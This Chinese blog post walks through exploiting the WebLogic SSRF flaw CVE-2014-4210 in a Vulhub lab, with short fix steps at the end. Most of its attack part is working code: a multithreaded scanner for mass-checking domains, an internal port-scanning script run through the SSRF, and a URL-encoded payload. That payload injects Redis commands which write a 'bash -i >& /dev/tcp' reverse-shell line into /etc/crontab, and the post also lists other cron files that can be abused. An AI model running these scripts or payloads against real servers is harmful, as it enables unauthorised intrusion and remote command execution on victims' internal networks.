(CVE-2014-4210) Weblogic SSRF漏洞

最新推荐文章于 2024-03-07 11:47:16 发布
最新推荐文章于 2024-03-07 11:47:16 发布
阅读量387 收藏 1
点赞数
分类专栏: 漏洞 web 文章标签: cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CNXBDSa/article/details/120062006
版权
本文详细介绍了SSRF(服务器端请求伪造)漏洞的概念、形成原因、利用方式和影响,通过Vulhub环境演示了WebLogic SSRF漏洞的复现过程,包括端口扫描、payload构造和内网服务探测。同时,文章提到了修复措施和可能的内网利用,如反弹shell,并列举了多个可能的内网利用点。
摘要由CSDN通过智能技术生成

近期接触到了SSRF的漏洞,就进行了一下本地的复现,利用Vulhub的进行复现,别问,问就是方便,直接docker一键启动,这感觉酸爽!

SSRF(服务器端请求伪造)

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
注释:除了http/https等方式可以造成ssrf,类似tcp connect 方式也可以探测内网一些ip 的端口是否开发服务,只不过危害比较小而已。

前提条件:

利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。
SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制,如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。

攻击方式:

  1. 对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;

  2. 攻击运行在内网或本地的应用程序需对内网Web应用进行指纹识别,识别企业内部的资产信息;

  3. 攻击内外网的Web应用,主要是使用HTTP GET请求就可以实现的攻击(struts2、SQli等);

  4. 利用file协议读取本地文件等

数据流:攻击者----->服务器---->目标地址

影响版本:

weblogic 10.0.2 – 10.3.6.0

批量检测Weblogc SSRF漏洞

既然要去复现Weblogc SSRF漏洞那不要提前检验一下是否存在?那这不安排上

#!/usr/bin/env python  

# -*- coding: utf-8 -*-

import re

import sys

import Queue

import requests

import threading

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()

mutex = threading.Lock()

class Test(threading.Thread):
    def __init__(self, queue):

        threading.Thread.__init__(self)

        self.queue = queue

    def check(self,domain,ip):

        payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)

            if m:

                mutex.acquire()

                with open('ssrf1.txt','a+') as f:

                    print "%s has weblogic ssrf." % domain

                    f.write("%s has weblogic ssrf." % domain)

                mutex.release()

        except Exception,e:

            print e

    def get_registry(self,domain):

        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)

            if m:

                return m.group(1)

        except Exception,e:

            print e

    def run(self):

        while not self.queue.empty():

            domain = self.queue.get()

            mutex.acquire()

            print domain

            mutex.release()

            ip = self.get_registry(domain)

            self.check(domain,ip)

            self.queue.task_done()

if __name__ == '__main__':

    with open('domain.txt','r') as f:

        lines = f.readlines()

    for line in lines:

        queue.put(line.strip())

    for x in xrange(1,50):

        t = Test(queue)

        t.setDaemon(True)

        t.start()

    queue.join()

使用创建一个domain.txt的文件在这个脚本同一目录下,然后py
在这里插入图片描述

测试环境搭建

使用vulhub创建环境,然后打开呗,vulhub地址在下面
https://vulhub.org/#/environments/weblogic/ssrf/

docker-compose up -d
访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用

漏洞存在于这
在这里插入图片描述**

payload:http://192.168.214.148:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

**
在这里插入图片描述通过返回状态码,可以看出端口未开放
在这里插入图片描述7000 端口开放
在这里插入图片描述
我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放、

在未知道payload的前提下,也可以通过burpsuite抓包判断可能存在SSRF漏洞,通过抓包明显可以看见operator在请求一个Url。

在这里插入图片描述

在这里插入图片描述

利用weblogic这个服务器作为跳板去攻击内网

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)。

疑问?在你不知道内网网段的情况下如何去一步步找到目标的网段了??

在这里插入图片描述在实战的情况下,这个地方会显示网段地址,可以利用脚本批量的跑

import thread

import time

import re

import requests


def ite_ip(ip):

    for i in range(1, 256):

        final_ip = '{ip}.{i}'.format(ip=ip, i=i)

        print final_ip

        thread.start_new_thread(scan, (final_ip,))

        time.sleep(2)



def scan(final_ip):

    ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')

    for port in ports:

        vul_url = 'http://192.168.214.148:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)

        try:

            #print vul_url

            r = requests.get(vul_url, timeout=15, verify=False)

            result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)

            result2 = re.findall('but could not connect', r.content)

            result3 = re.findall('No route to host', r.content)  

            if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:

                print '[!]'+final_ip + ':' + port

        except Exception, e:

            pass





if __name__ == '__main__':

    ip = "172.20.0"  

    if ip:

        print ip

        ite_ip(ip)

    else:

        print "no ip"

在这里你需要已经知道目标的网段,本次复现不知道的情况下怎么去扫描?解决办法直接 ifconfig 找到网段IP然后脚本跑
在这里插入图片描述在这里插入图片描述检测出了一个Redis服务(6379)
在这里插入图片描述payload:http://192.168.214.148:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379

注入HTTP头然后利用redis反弹shell

发送三条redis命令,将弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/IP/端口 0>&1\n\n\n\n"  
config set dir /etc/ 
config set dbfilename crontab 
save  ##将反弹shell写入到/etc/crontab
##/etc/crontab 这个文件负责安排由系统管理员制定的维护系统以及其他任务的crontab
##/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。

在这里插入图片描述

编码网站:http://www.jsons.cn/urlencode/

注意编码的时候ip地址要使用内网的地址,同一网段!

我们是通过GET来发送命令的,因此要将上面的命令进行URL编码,同时我们还要制定一个要写入的文件test(这里换行为%0A%0D)

payload:http://192.168.214.148:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.20.0.1%2F210%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave%0Aaaa
在这里插入图片描述在这里插入图片描述然后去靶机上面监听端口 我的反弹shell不知道为啥半天不反应,有待考究!不成功的原因找到了http://www.manongjc.com/detail/13-gvexrefjseakwqk.htmlUbuntu不行,回头用kali试试

最后补充一下,可进行利用的cron有如下几个地方:

/etc/crontab 这个是肯定的
/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
/var/spool/cron/root centos系统下root用户的cron文件
/var/spool/cron/crontabs/root debian系统下root用户的cron文件

修复

1.删除server/lib/uddiexplorer.war下的相应jsp文件。

#> jar -xvf uddiexplorer.war
#> rm jsp-files
#> jar -cvfM uddiexplorer.war uddiexplorer/

2.配置访问权限,取消对外开放。

阿波次的鹅佛鸽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic SSRF漏洞(CVE-2014-4210)
谢公子的博客
05-03 6300
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp页...
[Vulhub] Weblogic SSRF 漏洞CVE-2014-4210
weixin_45605352的博客
07-21 5544
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
漏洞复现CVE-2014-4210(Weblogic ssrf)
deginner2的博客
07-28 1143
Weblogic 漏洞复现
SSRF 漏洞CVE-2014-4210)】
最新发布
cyyyyy123的博客
03-07 677
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造请求,从而让服务端发起请求的一种安全漏洞。它将一个可以发起网络请求的服务当作跳板来攻击其他内部服务。SSRF的攻击目标一般是与外部隔离的内网资源。
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
weblogic 漏洞统计 CVE
09-18
6. CVE-2014-2479、CVE-2014-4210CVE-2014-4241、CVE-2014-4217、CVE-2014-4201、CVE-2014-4202:这些漏洞可能允许攻击者在未授权的情况下访问系统资源,造成信息泄露或系统控制。 7. CVE-2013-1504、CVE-2013-...
WebLogic SSRF 及漏洞修复
11-25
本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-2014-4210这一特定漏洞的修复方法。 #### 二、SSRF漏洞概述 SSRF漏洞通常出现在Web应用中,当应用未能正确地验证服务器响应时,攻击者可以利用这些漏洞绕...
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升级OpenSSL到OpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞(OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升级OpenSSL到OpenSSL 1.0.1g,同时重新编译升级OpenSSH和nginx,在此提供...
cve-2019-2618:Weblogic上传Vuln(需要用户名密码)-CVE-2019-2618
03-16
cve-2019-2618 Weblogic上传Vuln(需要用户名密码)-CVE-2019-2618python使用python CVE-2019-2618.py url username password解密weblogic密码root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_...
Weblogic-SSRF【CVE-2014-4210
周星星的博客
10-13 1291
weblogic-SSRF [CVE-2014-4210]漏洞复现
CVE-2014-4210 weblogic SSRF漏洞
nex1less的博客
10-21 524
0x01 漏洞地址 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 0x02 漏洞验证 1.访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。 2.
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1459
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
weblogic CVE-2014-4210 SSRF漏洞
ChenD的学习笔记
05-22 1542
然后直接VPS拉取vulhub的镜像出现连接不到反弹shell的问题(但是成功写入了,其实也算完成实验了),最后本地搞出来啦,结果没有ssh,猛男哭泣!redis可能存在未授权访问漏洞,同时redis默认是不对外开放的,意思就是说只有内网可以访问redis服务器,外网访问不到,这时候就体现出了SSRF请求伪造漏洞的作用。然后kali也出问题了,docker拉取的vulhub拉取的weblogic/ssrf 镜像,启动后只启动了weblogic,redis起不来,很怪异。
weblogic ssrf漏洞[CVE-2014-4210]
qq_43936524的博客
06-18 1082
文章目录vulhub复现环境搭建 vulhub复现 # 启动 cd vulhub/weblogic/ssrf/ docker-compose up -d # 开启了一个weblogic和redis环境 kit@VM-0-12-ubuntu:~/vulhub/weblogic/ssrf$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS P
Weblogic SSRF漏洞CVE-2014-4210
weixin_39664643的博客
01-25 1132
利用范围 版本10.0.2,10.3.6 原理 Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。 利用 漏洞靶场 编译及启动测试环境 docker-compose build docker-compose up -d 访问http
weblogic漏洞修复:CVE-2014-4210,UDDI Explorer对外开放
weixin_30765475的博客
12-19 567
漏洞描述 http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html 修复方式:   1.删除server/lib/uddiexplorer.war下的相应jsp文件。 #> jar -xvf uddiexp...
Weblogic SSRF(CVE-2014-4210)漏洞复现
m0_64583632的博客
02-06 520
Weblogic SSRF(CVE-2014-4210)漏洞复现
【vulhub】Weblogic_SSRF(CVE-2014-4210漏洞复现
qq_45300786的博客
04-12 284
这个真的不知道怎么回事,就是不能反弹shell,可能是我没有redis吧 还是直接放参考链接吧 https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md https://blog.csdn.net/LTtiandd/article/details/99592832 https://dyblogs.cn/dy/2275.html ...
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
CVE-2014-4210WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值